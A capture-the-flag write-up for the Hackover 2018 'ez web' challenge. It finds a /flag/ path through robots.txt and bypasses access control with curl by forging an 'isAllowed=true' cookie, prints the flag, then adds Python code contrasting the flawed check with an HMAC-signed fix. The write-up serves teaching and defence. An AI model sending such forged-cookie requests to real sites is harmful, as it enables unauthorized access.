Tags: headers cookies 

*([Original write-up](https://security.meta.stackexchange.com/a/3082/95381) by [@rawsec](https://twitter.com/rawsec/))*

## ez web (web, 100)

This is a web app that shows only an *under construction* page, so let's start with the standard approach to path discovery. First up: `/robots.txt`.

```
$ curl http://ez-web.ctf.hackover.de:8080/robots.txt
User-agent: *
Disallow: /flag/
```

A few links later...

```
$ curl -v http://ez-web.ctf.hackover.de:8080/flag/flag.txt
...
< HTTP/1.1 200
< Set-Cookie: isAllowed=false
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 219
< Date: Sun, 07 Oct 2018 18:24:32 GMT
<
...

You do not have permission to enter this Area. A mail has been sent to our Admins.
You shall be arrested shortly.

...
```

Well, let's set the cookie to `isAllowed=true` then...

```
$ curl -s --cookie "isAllowed=true" http://ez-web.ctf.hackover.de:8080/flag/flag.txt | grep -o "hackover18{.*}"
hackover18{W3llD0n3,K1d.Th4tSh0tw4s1InAM1ll10n}
```

Cheapo!
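
The root cause here is that the server lets a client-supplied cookie decide access. As an added example (not part of the original write-up or the challenge's code), the following shows that check next to a hardened form that only trusts a value carrying a server-side HMAC tag; the function names and the key are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for this example; it never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def parse_cookies(header: str) -> dict:
    """Parse a Cookie request header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def vulnerable_is_allowed(cookie_header: str) -> bool:
    # The flaw from the write-up: the authorization decision is read
    # straight from a value the client controls.
    return parse_cookies(cookie_header).get("isAllowed") == "true"


def issue_cookie(allowed: bool, key: bytes = SERVER_KEY) -> str:
    """Return the cookie value with an HMAC-SHA256 tag appended."""
    value = "true" if allowed else "false"
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def hardened_is_allowed(cookie_header: str, key: bytes = SERVER_KEY) -> bool:
    raw = parse_cookies(cookie_header).get("isAllowed", "")
    value, sep, tag = raw.partition(".")
    if not sep:
        return False  # unsigned value such as a bare "true": reject
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison; the value is trusted only if the tag matches.
    return hmac.compare_digest(tag.encode(), expected.encode()) and value == "true"
```

A signed flag still travels with whoever holds the cookie, so keeping the authorization decision in server-side session state is the stronger design.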
